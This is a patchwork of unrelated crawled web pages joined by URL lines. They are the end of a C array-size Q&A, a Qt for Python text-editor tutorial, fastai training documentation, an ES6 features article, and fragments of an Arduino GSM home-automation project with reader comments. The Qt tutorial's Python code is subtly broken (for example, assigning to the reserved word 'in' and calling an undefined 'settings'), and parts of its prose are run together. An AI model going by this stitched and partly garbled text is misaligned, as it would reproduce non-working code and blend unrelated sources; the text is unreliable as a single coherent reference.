Apr 01, 2018 Also GM's module received the sms in sim card memory but it not sending the sms to arduuno May 10, 2018 bro i have the same problem do you solved Nov 25, 2019 i have the same problem i think there is an probleme with code comand gsm May 31, 2019 hello dennis do you still have the complete code Feb 21, 2016 may you please provide the code for the Gsm based door unlock system which allows the user to unlock the door remotely by sending an sms to the gsm module. thank you Feb 23, 2016 Check this project: Automatic Door Opener using Arduino and taking use of both of these projects, you can build one and please share with us. Feb 26, 2016 Sir Nice project Feb 26, 2016 Dear Sir I followed the your projects Sir I want to make gsm relay contorl project But I have questions Gsm module how can I interface with gsm module? Ofter set at commends do we need to delete them? Can I use 3phase motor starter contorl? Please explain me Thank you very much Feb 29, 2016 I would like to wire a 12volt battery with a 7502 voltage reg.. and a attiny 85 to get more distance with my 433mhz transmitter Mar 02, 2016 which program do you use to draw the schematic for the circuit diagram ? thank you Mar 11, 2016 Proteus with Arduino Library installed. Mar 04, 2016 CAN U PLEASE HELP ME TO SET GSM MODULE (900A)) FOR THE SAME APPLICATION Mar 11, 2016 We have already explained the setup of GSM in the above project itself. And if you want to know more, we have lot of projects which are using GSM with Arduino, go through this link and check: Mar 07, 2016 does this code is same for 8051 or diffrent if so plz provide me the 8051 code. Mar 19, 2016 this code can only used for arduino. if u are using 8051 the mode may be different Mar 20, 2016 sir why can't we use serial.find() everywhere in code instead of string operations Mar 21, 2016 sir the system works fine for 1st msg but doesnt respond to the next messages. then i have to reset the whole system to execute the message Apr 03, 2016 SIR the program is very help full Thank you very much Apr 06, 2016 sir, i did as prescribed and it is working fine with the serial monitor. but when it comes to gsm module it does not respond to the second message. ie, if i send #A.tv on* for the first time , it works fine... but then the system does not respond to whatever message i send to the gsm module.... have been with this problem for a lot of time... please help me sir.. Apr 10, 2016 For toz circuit can i use Gsm 2 click Apr 11, 2016 @ashind i m also getting the same error C:\Users\Home\Documents\Arduino\test11\test11.ino: In function 'void serialEvent()': C:\Users\Home\Documents\Arduino\test11\test11.ino:143:25: warning: deprecated conversion from string constant to 'char*' [-Wwrite-strings] if(Serial.find("#A.")) how to get rid of this error?? kindly reply soon May 01, 2016 @sneha this is not an error .this is just a warning....so dnt wrry u will get o/p Apr 13, 2016 Can i knw wat type of GSM that in use in tiz circuit .. bcos went i search Gsm Module its goes wrong can i get the full name of the GSM Apr 18, 2016 Gsm Module is SIM900A, its already given in the description. Apr 22, 2017 @Maddy can i use SIM900D over SIM900A? Apr 17, 2016 The code is not being uploaded.dnt knw y it is happening.does d code need any modification? Apr 21, 2016 no need of any modification in code. remove rx and tx pin from arduino before uploading code. Apr 28, 2016 sir, can i use sim 900A inplace of sim900. if yes, then is there any change in programme. 
May 07, 2016 hello sir, how i wan to caotrol 8 bulb how i proceed plzz help me May 17, 2016 ULN2003 can drive upto 7 Relays, use ULN2803 for 8 Relays. Change the code and connections accordingly. May 07, 2016 Dear Sir, Please send the GSM module to my email id. Your site is good and I am beginner. I wanted to learn. [] May 11, 2016 hii sir the above aurdino gsm program how to upload and which softaware using .i have upload but some java error is diplay May 17, 2016 Use Arduino IDE software (Arduino Nightly :) to burn the code into Arduino. May 11, 2016 Please can you help me i tried to send sms on my gsm but is not turning on any thing what is the problem and sms shows received in my mobile May 19, 2016 sir im using 12v/2A GSM module. can u please explain the current and voltage supply rating for the whole circuit. can i use 12v 2A adaptor for whole circuite..? May 20, 2016 can one use sim800 in place of sim900? May 20, 2016 will any gsm module work with the same code? May 21, 2016 Yes, any GSM module should work, just check its Tx and Rx connections. May 22, 2016 I am doing project "WIRELESS WEATHER MONITORING SYSTEM"using arduino uno, GSM sim900a, LCD 16x2, temperature and humidity sensor dht11…now I request yourgood self to please provide me a program that will display current temperature and humidity on LCD. also if we send SMS from any mobile number to a mobile number of simcard that is in GSM to send current temperature or humidity it must send back SMS to the mobile number from which it received SMS with current temperature or humidity.. May 28, 2016 Check this one :Humidity and Temperature Measurement using Arduino, and try to integrate the GSM Module. May 23, 2016 please any one can help me I asked one week before regarding this code not working for me when I send sms to gsm nothing happen even if sms shows received please please any one can help me is very nice project I need to build it my email is [] any one can post me working codes May 28, 2016 First only try to Interface GSM Module with Arduino, check here for Circuits using GSM with Arduino Jun 01, 2016 i like to share my home automation project. my project was GSM based home automation system with SMS feedback and gas leakage sms alert system with automatic power shutdown *when we sent sms to ARDUINO through GSM module. GSM module will sent an feedback sms to owners mobile number *when smoke is detected by MQ5 the Arduino will sent 3 alert sms to owners mobile number and will also shunt down the power. if anybody need this project program pleas contact me Jul 04, 2016 Sir i want to do a call based GSM module project on 8051 micro controller to control the door locking system along with other home appliances, being a new comer i need the complete detail 1) full step what can i do step by step 2) program for 8051 i shall be very thankful to you , looking forward for your kind reply Jul 09, 2016 Bro I am doing the same project plzz help me up with any data ypu have collected so far Aug 15, 2018 Hi @ashind . Your project is interesting. Please provide your project details like circuits diagram & project code. Jun 02, 2016 i really love this project...how can i buy it Jun 14, 2016 sir it's not working can we use sim900a instead of sim900 Jul 25, 2016 Dear saddam great project but some time GSM turning on leds and some time not. please explain Jul 29, 2016 Thanks. you may try with long wire antenna or also you may change your operator. and you may also change your supply source Aug 02, 2016 Can someone help me? This is my code. 
#include <LiquidCrystal.h> #include "SIM900.h" #include "sms.h" #include <SoftwareSerial.h> //#include <sms.h> #include <PString.h> SMSGSM sms; boolean started = false; char buffer[160]; char smsbuffer[160]; char n[20]; //LiquidCrystal lcd(4,2,3,7,8,9); int buttonState; int lastButtonState = LOW; long lastDebounceTime = 0; long debounceDelay = 50; boolean st = false; int buzzer = 12; void setup() { //lcd.begin(16, 2); Serial.begin(9600); if (gsm.begin(2400)) { started = true; } if (started) { delsms(); } sms.SendSMS("+6xxxxxxxxxx" , "Gas Sensor and GSM module activated"); } void loop() { //lcd.setCursor(0, 0); //lcd.print("Detektor Gas SMS"); int val = analogRead(A0); val = map(val, 0, 1023, 0, 100); //lcd.setCursor(0,1); //lcd.print("Kadar: "); //lcd.print(val); //lcd.print("% "); //code using sensor detection if (val > 10) { tone(buzzer,800,500); delay(1000); st = true; } else st = false; if (st != lastButtonState) { lastDebounceTime = millis(); } if ((millis() - lastDebounceTime) > debounceDelay) { if (st != buttonState) { buttonState = st; if (buttonState == HIGH) { PString str(buffer, sizeof(buffer)); str.begin(); str.print("Gas Detected! Gas leakage at "); str.print(val); str.print("%"); //String a=str; sms.SendSMS("+6xxxxxxxxxx", buffer); } } } //code using sms lapor. lastButtonState = st; int pos = 0; if (started) { pos = sms.IsSMSPresent(SMS_ALL); if (pos) { sms.GetSMS(pos, n, smsbuffer, 100); delay(2000); if (!strcmp(smsbuffer, "lapor")) { PString str(buffer, sizeof(buffer)); str.begin(); str.print("Rate of gas leakage currently at "); str.print(val); str.print("%"); //String a=str; sms.SendSMS("+6xxxxxxxxxx", buffer); } delsms(); } } } //delete sms yang dihantar void delsms() { for (int i = 0; i < 10; i++) { int pos = sms.IsSMSPresent(SMS_ALL); if (pos != 0) { if (sms.DeleteSMS(pos) == 1) {} else {} } } } code. But I want to change the second option to be auto reply to any incoming number. What should I do? Aug 04, 2016 Sir, I want to do the same project by using micro-controller 8051. As i am new comer i want detail information about it. program, all steps, if u have any video then it also etc plz send me on my email. Thanks, looking forward for your kind reply. Aug 06, 2016 Dear SK, Very nicely explained project ever I came across. It has created a lot of interest in my son including me. I thank for your sincere and fare sharing of knowledge. Thnaks a lot. Aug 14, 2016 sir if we are using microprocessor there are two circuit diagrams one is for transmitter and another is for receiver but here is only one so is it like combined or what?? Aug 20, 2016 Transmitter is our cell phone itself. Sep 13, 2016 Hi im thinking to make this project does this works properly? But ive compiled this code and it is showing some error Oct 06, 2016 Project is working properly, please share the Error you are getting. Sep 22, 2016 pliz i need to know how the program works and how i use the gsm Sep 28, 2016 can you give me the code of this project .. please modify the code please can you take the crystal or lcd ... and make it compatible with GSM sim 800L please Sep 28, 2016 I am getting error in serial.find function Sep 30, 2016 Sir. I have try Interfacing GSM Module with Arduino, its working fine. But when i try your project. The bulb does not light up when i send sms to gsm. It show that the sim card in the gsm receive the message but it keep resetting itself. 
Please help me Oct 02, 2016 i am not try it yet Oct 03, 2016 please help me I did all the right connections I uploaded the source code But when I send a message None of the relay switches not what is the problem? Oct 06, 2016 We have already explained the setup of GSM in the above project itself. And if you want to know more, we have lot of projects which are using GSM with Arduino, Try to interface GSM first, check: Oct 07, 2016 can someone help me pls. I connected the circuit as shown above. the LCD is ok but it is not responding to the on/off messages. I'm using sim800l. is there any modification in the program? if yes, how do I go about it? Oct 07, 2016 Hello sir, please am using SIM900A with two sets of pins (6 pins in group and 3 pins also in group), i do not know how to go about the connections since its a bit different from your own module Oct 07, 2016 Check the data sheet of your Module, you just need to find out serial communication pins Tx, Rx and power supply pins (Vcc and GND) in your GSM module. Oct 07, 2016 sir currently i have arduino mega .so can i use mega instead of arduino uno for the same program ?? Oct 07, 2016 Yes, you can use Arduino Mega Oct 11, 2016 Hi i am working on project, appliances control & switching using gsm & bluetooth , can you help? Oct 12, 2016 hye sir , do you create ur own relay circuit ? can i have the schematic . i just kind of confuse whether the relay circuit have connection that related to Arduino Uno. Oct 15, 2016 Yes, its custom created Relay Module on Dot board which has ULN2003 on it. It may available in the Market too. Pages
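Several commenters above ask how to reply to whichever number sent the SMS instead of a hard-coded one. A minimal sketch of that change, assuming the same GSM-Shield/SMSGSM library used in the code posted above (and that GetSMS() fills its second argument with the sender's number, which is what that library appears to do):

#include "SIM900.h"
#include "sms.h"
#include <SoftwareSerial.h>

SMSGSM sms;
char sender[20];       // filled by GetSMS() with the sender's number
char smsbuffer[160];

void setup() {
  Serial.begin(9600);
  gsm.begin(2400);     // the gsm object is provided by the SIM900 library
}

void loop() {
  int pos = sms.IsSMSPresent(SMS_ALL);
  if (pos) {
    sms.GetSMS(pos, sender, smsbuffer, 100);
    if (!strcmp(smsbuffer, "lapor")) {
      // reply to whoever sent the message, not to a fixed number
      sms.SendSMS(sender, "Auto reply: message received");
    }
    sms.DeleteSMS(pos);
  }
}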
https://circuitdigest.com/microcontroller-projects/gsm-based-home-automation-using-arduino
CC-MAIN-2020-05
en
refinedweb
From: vesa_karvonen (vesa_karvonen_at_[hidden]) Date: 2002-02-07 07:48:45 --- In boost_at_y..., "David Abrahams" <david.abrahams_at_r...> wrote: > I agree with you that consistency is important. I don't have a > strong opinion about which way is "correct". Proof by intimidation follows... :) The first thing I would like to ask from you is to provide a list of books that have C or C++ source code snippets that use the #include <...> form to include anything else but either standard library headers or system headers (e.g. posix). For each book that you are able to find, I promise to be able to list 10 books that do not. In other words, if you find 10 books that use the #include <...> form for their own source files, I promise to find 100 books that do not. I also claim that the average technical quality of the books that I will list, according ACCU reviewers, will be higher. Don't take this too seriously! I hope that you understand what I'm getting at. "De facto" standards and "existing practice" are very important considerations. > I think on compilers > that distinguish "..." from <...> there are advantages to the user > to being able to include everything in his application with "..." > and everything outside with <...>, but I'm open to other schemes. What if a library is also an application? Do you then use: #ifdef COMPILE_AS_APP #include "otsikkotiedosto.h" #else #include <otsikkotiedosto.h> #endif everywhere so that you can choose which form to use? Which form of include do you use inside the library to include its own source files? The main problem I see with your argument is the problem of defining what exactly defines "everything in his application" and "everything outside". Especially because such things are very likely to change over time as the code base evolves. For instance, the company where I work, builds applications that consist of dozens of libraries and only relatively small "application core". Initially many of these libraries have been developed for use in only a specific application or for our own use. Which include form would you use for these libraries? However, we have licensed some of the libraries to external developers and we (well I anyway) have plans to start moving many of these libraries to open source. Which include form would you use for these libraries now? PRINCIPLE: Moving source code from one project or organization to another should not require changing it. The only clear conclusion that I can draw based on the C++ standard, existing practice and the desire to find a simple and easy way to choose the proper form of include is that: - #include <...> is reserved for standard library headers and - #include "..." is for everything else. The above rule is: - easy to define - not challenged by the C++ standard - conforms to existing practice - has extensive support in high quality C++ literature > I would love to see an argument about this which appeals to > reasoning stronger than "Bjarne thinks it should work this way" > or "lots of people do it this way". So far, I never have. It is most unfortunate that neither the C nor the C++ standard have the guts to clearly define what are the relationships of the following terms: - header - library header - standard [C/C++] library header - source file My conclusion is that the term "header" technically refers to a standard library header. I couldn't find anything in the standard that would use the term "header" to refer to a user defined files. The term "source file" refers to user defined source files. 
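To make the closing rule concrete, a user source file following it would look something like this (the file names are purely illustrative):

// my_module.cpp
#include <vector>                 // standard library header: angle brackets
#include <cstdio>                 // standard library header: angle brackets
#include "my_project/config.h"    // our own source file: quotes
#include "boost/smart_ptr.hpp"    // any non-standard library: still quotes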
https://lists.boost.org/Archives/boost/2002/02/24713.php
CC-MAIN-2020-05
en
refinedweb
Registering RouterInfo by L3 extension API¶ Launchpad blueprint: Currently, most plugin implementations related to L3 override the L3NATAgent class itself for their own logic since there is no proper interface to extend the RouterInfo class. This adds unnecessary complexity for developers who just want to extend the agent mechanism instead of the whole RPC related to L3 functionalities. This spec introduces the RouterFactory class which acts on the factory for creating the RouterInfo class, and adds a new parameter to the L3 agent extension API which enables it to dynamically register RouterInfo to the factory. Now plugin developers can use the new extension API for their own specific router. Problem Description¶ Current L3 agent implementation in Neutron consists of two parts in general. One is to implement an RPC Plugin API from Neutron server, and the other is to create ports, namespaces, and iptables rules using the data obtained from the RPC API on the server. To be more specific, the former is the L3NATAgent class and the latter is the RouterInfo class. The problem is that the two parts mentioned are now tightly coupled which means there is no clear way to extend each part individually. A lot of projects related to Neutron called networking-* 1, 2, 3 are making new L3 agent classes on their own by extending the L3NATAgent class even though they did not modify the RPC mechanism but only changed the RouterInfo mechanism running on their server. Also, the current RouterInfo class does not have an abstract interface which makes it harder to extend the class for plugin developers. They have to find what functions and variables in RouterInfo are externally used in the L3 agent to extend the RouterInfo behaviors. Proposed Change¶ Today, RouterInfo is extended in several ways according to specific router features such as distributed, ha, and distributed + ha. This document proposes changing the L3 agent to have a new class called RouterFactory which has several pre-registered classes to extend the RouterInfo class with certain features. When it comes to creating an actual RouterInfo instance, the L3 agent create a new instance from the RouterFactory following the features of the router. There is no functional change for existing code. L3AgentExtensionAPI now has a new parameter router_factory and a new function register_router. A new abstract class called BaseRouterInfo will be added. It will declare interfaces that are currently used externally. An L3 extension can register their own RouterInfo class which implements BaseRouterInfo using the register_router API which has two parameters. router: RouterInfo declared in extension which overrides the one pre-registered at RouterFactory features: features of RouterInfo. Currently it should be one of the below. Features should be a list of strings describing router characteristics, and the ordering does not matter since it is interpreted as a set internally. ( ['ha', 'distributed']and ['distributed', 'ha']are the same) []: No feature. (e.g. LegacyRouter) ['distributed']: Distributed router. (e.g. DvrEdgeRouter, DvrLocalRouter) ['ha']: HA router. (e.g. HaRouter) ['ha', 'distributed']: Distributed HA router. (e.g. DvrEdgeHaRouter, DvrLocalRouter) Note that a router with the feature of ['ha', 'distributed']can be DvrLocalRouterwhen L3 agent mode is not dvr_snat4. L3 extensions can override the RouterInfo class implemented in the Neutron codebase when it is initialized using the initialize function. 
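As a sketch of how an L3 agent extension might use the proposed API (only register_router and its two parameters come from this spec; the module path and the extension hook names follow the existing agent-extension framework and are assumptions here):

from neutron.agent.l3 import router_info


class VendorRouterInfo(router_info.RouterInfo):
    # Plugin-specific processing would be added here by overriding the
    # methods declared in the proposed BaseRouterInfo interface.
    pass


class VendorL3Extension(object):
    """Sketch of an L3 agent extension registering its own RouterInfo."""

    def consume_api(self, agent_api):
        # agent_api is the L3AgentExtensionAPI instance handed to extensions;
        # register our RouterInfo for routers with the 'ha' feature.
        agent_api.register_router(VendorRouterInfo, ['ha'])

    def initialize(self, connection, driver_type):
        pass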
Implementation¶
Assignee(s)¶
Yang Youseok <[email protected]>
References¶
- 1 networking-odl:
- 2 networking-ovn:
- 3 networking-calico:
- 4
- 5
- 6
https://specs.openstack.org/openstack/neutron-specs/specs/stein/router-factory-with-l3-extension.html
CC-MAIN-2020-05
en
refinedweb
Hi, I'm trying to experiment with Guizero to make a simple GUI, and I'm getting this error when I run my program: "Tkinter did not import successfully". I've tried uninstalling and reinstalling guizero, but no luck so far. I'm following the guide from the latest issue of PiMag. Any thoughts? My import line is as follows: from guizero import App, Text, TextBox, PUshButton, Slider
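A quick way to narrow that down, assuming Python 3 on Raspbian, is to check whether the Tk bindings themselves import before pulling in guizero (guizero is only a thin layer on top of tkinter):

# If this import fails, install the Tk bindings first
# (on Raspbian: sudo apt-get install python3-tk) and retry.
import tkinter

from guizero import App, Text, TextBox, PushButton, Slider

app = App(title="guizero test")
Text(app, text="tkinter and guizero both imported fine")
app.display()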
https://www.raspberrypi.org/forums/viewtopic.php?p=1167991
CC-MAIN-2020-05
en
refinedweb
Hex to Binary Converter Online Tool
About Hex to Binary Converter Online Tool: This online hex to binary converter tool helps you to convert one input hex number (base 16) into a binary number (base 2).
Hex to Binary conversion table:
More information: Wikipedia (Hexadecimal): Wikipedia (Binary):
Convert Hex to Binary with Python:

def hex_to_binary(hex_str):
    decimal_number = int(hex_str, 16)
    binary_number = bin(decimal_number)
    return binary_number

hex_input = 'ccccccccc'
binary_output = hex_to_binary(hex_input)
print('binary result is:{0}'.format(binary_output))

-------------------
binary result is:0b110011001100110011001100110011001100

Convert Hex to Binary with Java:

public class NumberConvertManager {
    public static String hex_to_binary(String hex_input) {
        int decimal_int = Integer.parseInt(hex_input, 16);
        return Integer.toBinaryString(decimal_int);
    }

    public static void main(String[] args) {
        String hex_input = "f4";
        String binary_output = hex_to_binary(hex_input);
        System.out.println("binary result is:" + binary_output);
    }
}

-------------------
binary result is:11110100
https://coding.tools/hex-to-binary
CC-MAIN-2020-05
en
refinedweb
Earlier we said that a common anti-crawler measure is to detect the client IP and limit its access frequency, so we need to bypass this limitation by setting up a pool of proxy IPs. There are many websites that offer free proxy IPs, and we can harvest a large number of them from such a site. However, not every one of these IPs can actually be used; in fact only a few of them work. We can use BeautifulSoup to parse the pages and extract the proxy IP list, or match them with regular expressions; regular expressions are faster. Here ip_url is the listing page URL (omitted in this copy), and random_header() is a function that returns a randomly chosen request header.

import re
import time
import requests

def download_page(url):
    headers = random_header()
    data = requests.get(url, headers=headers)
    return data

def get_proxies(page_num, ip_url):
    available_ip = []
    for page in range(1, page_num):
        print("Crawling proxy IPs on page %d" % page)
        url = ip_url + str(page)
        r = download_page(url)
        r.encoding = 'utf-8'
        # The original pattern matched the IP and port cells of the listing
        # table; its HTML tags were lost when this article was extracted.
        pattern = re.compile('.*?.*?.*?(.*?).*?(.*?)', re.S)
        ip_list = re.findall(pattern, r.text)
        for ip in ip_list:
            if test_ip(ip):
                print('%s:%s passed the test and is added to the list of available proxies' % (ip[0], ip[1]))
                available_ip.append(ip)
        time.sleep(10)
    print('Crawl finished')
    return available_ip

After getting the IPs, we also need to check each one to make sure it can actually be used. How do we detect this? We can use the proxy IP to access a website that displays the requesting IP, and then check the result of the request.

def test_ip(ip, test_url=''):
    proxies = {'http': ip[0] + ':' + ip[1]}
    try_ip = ip[0]
    try:
        r = requests.get(test_url, headers=random_header(), proxies=proxies)
        if r.status_code == 200:
            r.encoding = 'gbk'
            result = re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', r.text)
            result = result.group()
            print(result)
            if result[:9] == try_ip[:9]:
                print('%s:%s passed the test' % (ip[0], ip[1]))
                return True
            else:
                print('%s:%s proxy failed, the local IP was used instead' % (ip[0], ip[1]))
                return False
        else:
            print('%s:%s response code is not 200' % (ip[0], ip[1]))
            return False
    except Exception as e:
        print(e)
        print('%s:%s error' % (ip[0], ip[1]))
        return False

Some tutorials treat any 200 HTTP status code as success. That is wrong: when the proxy fails, the request silently falls back to your own IP, and of course a request from your own IP succeeds. Finally, we should check an IP again right before using it, because we never know when it will stop working, so it is a good idea to keep plenty of proxy IPs stored to avoid running out when you need them. The code for this article is based on a referenced article (link lost in this copy), with some modifications of my own.
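Once a list of working proxies has been collected, using one is just a matter of passing it to requests. A small sketch (the target URL is a placeholder and random_header() is the helper from the article above):

import random
import requests

def fetch_with_proxy(url, available_ip):
    # pick one of the (ip, port) pairs returned by get_proxies()
    ip = random.choice(available_ip)
    proxies = {'http': ip[0] + ':' + ip[1]}
    return requests.get(url, headers=random_header(),
                        proxies=proxies, timeout=10)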
https://developpaper.com/reptiles-2-establishment-of-proxy-ip-pool/
CC-MAIN-2020-05
en
refinedweb
From: Darin Adler (darin_at_[hidden])
Date: 2000-01-24 13:31:03

> IMO, the best resolution is a change to the Standard, allowing overloading
> of functions in namespace std as long as the same semantics were preserved.
> This would allow us to always use explicit qualification. Has this been
> presented as an issue to the working group yet?

I agree. And no, I don't think anyone has submitted a defect report to the library working group about this yet.

-- Darin
https://lists.boost.org/Archives/boost/2000/01/1910.php
CC-MAIN-2020-05
en
refinedweb
OpenMX¶ Introduction¶ OpenMX (Open source package for Material eXplorer) is a software package for nano-scale material simulations based on density functional theories (DFT), norm-conserving pseudopotentials, and pseudo-atomic localized basis functions. This interface makes it possible to use OpenMX as a calculator in ASE, and also to use ASE as a post-processor for an already performed OpenMX calculation. You should import the OpenMX calculator when writing ASE code. To import into your python code, from ase.calculators.openmx import OpenMX Then you can define a calculator object and set it as the calculator of an atoms object: calc = OpenMX(**kwargs) atoms.set_calculator(calc) Environment variables¶ The environment variable ASE_OPENMX_COMMAND must point to that file. A directory containing the pseudopotential directories VPS, and it is to be put in the environment variable OPENMX_DFT_DATA_PATH. Set both environment variables in your shell configuration file: $ export OPENMX_DFT_DATA_PATH=/openmx/DFT_DATA13 $ export ASE_OPENMX_COMMAND='openmx' Keyword Arguments of OpenMX objects¶ kwargs are categorized by integer, float, string, boolean, tuple and matrix. Integer keyword argument(kwargs) is argument have integer value. For example, calc = OpenMX(scf_maxiter = 500, md_maxiter = 100, ...) as you can see, in ASE, standard format is to use lowercase alphabet. To follow this rule, every OpenMX keyword are changed to standard format. Further more, since python dose not allow dot(.) as a variable name. Every dot is changed to underbar(_). For example,: scf.maxIter -> scf_maxiter MD.maxIter -> md_maxiter Some variable such like atoms_number or species_number, which can be guessed easily, are automatically generated by the given information from atoms object. Float keywords are keyword have float type. Standard rules are applied like integer keywords. You can specify OpenMX float keywords by specifying, from ase.units import Ha calc = OpenMX(scf_criterion = 1e-6, energy_cutoff = 150 * Ry, ...) scf_criterion is correspond to scf.criterion. The other arguement energy_cutoff is a standard parameter format referencing GPAW. It acts same as scf_energycutoff. However, units are different. ASE uses standard energy unit as eV, and OpenMX scf.energycutoff uses the Rydburg unit. Thus, one have to specify the unit explicitly. This keyword and unit thing is applied to every keyword. For example, command above will be same as specifying, from ase.units import Ry calc = OpenMX(scf_criterion = 1e-6, scf_energycutoff = 150, ...) energy_cutoff is correspond to scf_energycutoff. But it is written in standard format. More standard paramters are specified in calculators/openmx/parameter.py. Bool keywords have boolean format, True or False. This will be translated On or Off when writing input file. For example, calc = OpenMX(scf_restart = True, scf_spinorbit_coupling = True, ...) String keywords are keyword have string format. For example, calc = OpenMX(scf_xctype = 'LDA', xc = 'PBE', ...) Both keyword arguments specifying exchange correlation we want to calculate. Left is written in OpenMX format and the right one is written in standard format. If calculator see contradicting arguments, it will use standard keyword xc and scf_xctype will be ignored. Tuple keywords are keyword that have length 3. For example, calc = OpenMX(scf_kgrid = (4, 4, 4), ...) Matrix keywords are keyword that have special format in OpenMX. 
For example,: <Definition.of.Atomic.Species H H5.0-s2p2d1 H_CA13 C C5.0-s2p2d2 C_CA13 Definition.of.Atomic.Species> This is typical example of matrix keyword. User can specify explicitly this argument using python list object. For example, calc = OpenMX(definition_of_atomic_species=[['H','H5.0-s2p2d1','H_CA13'], ['C','C5.0-s2p2d2','C_CA13']]) although user can specify it explicity, most of the case, this matrix Arguments are generated automatically by the information using Atoms object. information such like cutoff radius or… See the official OpenMX manual for more detail. The default setting used by the OpenMX interface is - class ase.calculators.openmx. OpenMX(restart=None, ignore_bad_restart_file=False, label='./openmx', atoms=None, command=None, mpi=None, pbs=None, **kwargs)[source]¶ Calculator interface to the OpenMX code. File-IO calculator. - command: str Command used to start calculation. Below follows a list with a selection of standard parameters Calculator parameters¶ By default, calculator uses \(openmx\) arguments to run the code. However, single node caluclating is not a good way to run heavy DFT calculation. Parallel computation is inevitable. In OpenMX calculator, user may choose the way to run. There are two ways to excute the code. First is to use MPI and the second is to use Plane Batch System. MPI method can be applied in general. To use it, put the mpi dictionary as a kwargs. For example, calc = OpenMX(mpi={'processes':20, 'threads':3}, ...) Similarly, You can use PBS method by specifying kwargs, calc = OpenMX(pbs={'processes':20, 'threads':3, 'walltime':'100:00:00'}, ...) Note PBS method will not be applied unless you have schedular specifically supports PBS. If your schedular support \(qsub\) command and \(qlist\) command, you may check pbs command is possible to use. Below follows a list with a selection of calculator paramters
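Putting the keyword examples above together, a complete calculation script might look like the following sketch (the H2 geometry, the basis/pseudopotential names and all keyword values are only illustrative, and the environment variables described earlier are assumed to be set):

from ase import Atoms
from ase.calculators.openmx import OpenMX

# A toy H2 molecule in a small periodic box (values chosen for illustration)
atoms = Atoms('H2', positions=[(0.0, 0.0, 0.0), (0.0, 0.0, 0.75)],
              cell=(6.0, 6.0, 6.0), pbc=True)

calc = OpenMX(label='./h2',
              scf_xctype='LDA',
              scf_energycutoff=150,
              scf_kgrid=(1, 1, 1),
              definition_of_atomic_species=[['H', 'H5.0-s2p2d1', 'H_CA13']])
atoms.set_calculator(calc)

print('Total energy (eV):', atoms.get_potential_energy())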
https://wiki.fysik.dtu.dk/ase/ase/calculators/openmx.html
CC-MAIN-2020-05
en
refinedweb
copyfile(3) BSD Library Functions Manual copyfile(3) NAME copyfile, fcopyfile, copyfile_state_alloc, copyfile_state_free, copyfile_state_get, copyfile_state_set -- copy a file LIBRARY Standard C Library (libc, -lc) SYNOPSIS #include <copyfile.h> int copyfile(const char *from, const char *to, copyfile_state_t state, copyfile_flags_t flags); int fcopyfile(int from, int to, copyfile_state_t state, copyfile_flags_t flags); copyfile_state_t copyfile_state_alloc(void); int copyfile_state_free(copyfile_state_t state); int copyfile_state_get(copyfile_state_t state, uint32_t flag, void * dst); int copyfile_state_set(copyfile_state_t state, uint32_t flag, const void * src); typedef int (*copyfile_callback_t)(int what, int stage, copyfile_state_t state, const char * src, const char * dst, void * ctx); DESCRIPTION These functions are used to copy a file's data and/or metadata. (Meta- data consists of permissions, extended attributes, access control lists, and so forth.) The copyfile_state_alloc() function initializes a copyfile_state_t object (which is an opaque data type). This object can be passed to copyfile() and fcopyfile(); copyfile_state_get() and copyfile_state_set() can be used to manipulate the state (see below). The copyfile_state_free() function is used to deallocate the object and its contents. The copyfile() function can copy the named from file to the named to file; the fcopyfile() function does the same, but using the file descrip- tors of already-opened files. If the state parameter is the return value from copyfile_state_alloc(), then copyfile() and fcopyfile() will use the information from the state object; if it is NULL, then both functions will work normally, but less control will be available to the caller. The flags parameter controls which contents are copied: COPYFILE_ACL Copy the source file's access control lists. COPYFILE_STAT Copy the source file's POSIX information (mode, modifica- tion time, etc.). COPYFILE_XATTR Copy the source file's extended attributes. COPYFILE_DATA Copy the source file's data. These values may be or'd together; several convenience macros are pro- vided: COPYFILE_SECURITY Copy the source file's POSIX and ACL information; equivalent to (COPYFILE_STAT|COPYFILE_ACL). COPYFILE_METADATA Copy the metadata; equivalent to (COPYFILE_SECURITY|COPYFILE_XATTR). COPYFILE_ALL Copy the entire file; equivalent to (COPYFILE_METADATA|COPYFILE_DATA). The copyfile() and fcopyfile() functions can also have their behavior modified by the following flags: COPYFILE_RECURSIVE Causes copyfile() to recursively copy a hierarchy. This flag is not used by fcopyfile(); see below for more information. COPYFILE_CHECK Return a bitmask (corresponding to the flags argu- ment) indicating which contents would be copied; no data are actually copied. (E.g., if flags was set to COPYFILE_CHECK|COPYFILE_METADATA, and the from file had extended attributes but no ACLs, the return value would be COPYFILE_XATTR .) COPYFILE_PACK Serialize the from file. The to file is an Apple- Double-format file. COPYFILE_UNPACK Unserialize the from file. The from file is an AppleDouble-format file; the to file will have the extended attributes, ACLs, resource fork, and FinderInfo data from the to file, regardless of the flags argument passed in. COPYFILE_EXCL Fail if the to file already exists. (This is only applicable for the copyfile() function.) COPYFILE_NOFOLLOW_SRC Do not follow the from file, if it is a symbolic link. (This is only applicable for the copyfile() function.) 
COPYFILE_NOFOLLOW_DST Do not follow the to file, if it is a symbolic link. (This is only applicable for the copyfile() function.) COPYFILE_MOVE Unlink (using remove(3)) the from file. (This is only applicable for the copyfile() function.) No error is returned if remove(3) fails. Note that remove(3) removes a symbolic link itself, not the target of the link. COPYFILE_UNLINK Unlink the to file before starting. (This is only applicable for the copyfile() function.) COPYFILE_NOFOLLOW This is a convenience macro, equivalent to (COPYFILE_NOFOLLOW_DST|COPYFILE_NOFOLLOW_SRC). The copyfile_state_get() and copyfile_state_set() functions can be used to manipulate the copyfile_state_t object returned by copyfile_state_alloc(). In both functions, the dst parameter's type depends on the flag parameter that is passed in. COPYFILE_STATE_SRC_FD COPYFILE_STATE_DST_FD Get or set the file descriptor associated with the source (or destination) file. If this has not been initialized yet, the value will be -2. The dst (for copyfile_state_get()) and src (for copyfile_state_set()) parameters are point- ers to int. COPYFILE_STATE_SRC_FILENAME COPYFILE_STATE_DST_FILENAME Get or set the filename associated with the source (or destination) file. If it has not been initialized yet, the value will be NULL. For copyfile_state_set(), the src parameter is a pointer to a C string (i.e., char* ); copyfile_state_set() makes a pri- vate copy of this string. For copyfile_state_get() function, the dst parameter is a pointer to a pointer to a C string (i.e., char** ); the returned value is a pointer to the state 's copy, and must not be modified or released. COPYFILE_STATE_STATUS_CB Get or set the callback status function (currently only used for recursive copies; see below for details). The src parameter is a pointer to a function of type copyfile_callback_t (see above). COPYFILE_STATE_STATUS_CTX Get or set the context parameter for the status call-back function (see below for details). The src parameter is a void *. COPYFILE_STATE_QUARANTINE Get or set the quarantine information with the source file. The src parameter is a pointer to an opaque object (type void * ). COPYFILE_STATE_COPIED Get the number of data bytes copied so far. (Only valid for copyfile_state_get(); see below for more details about 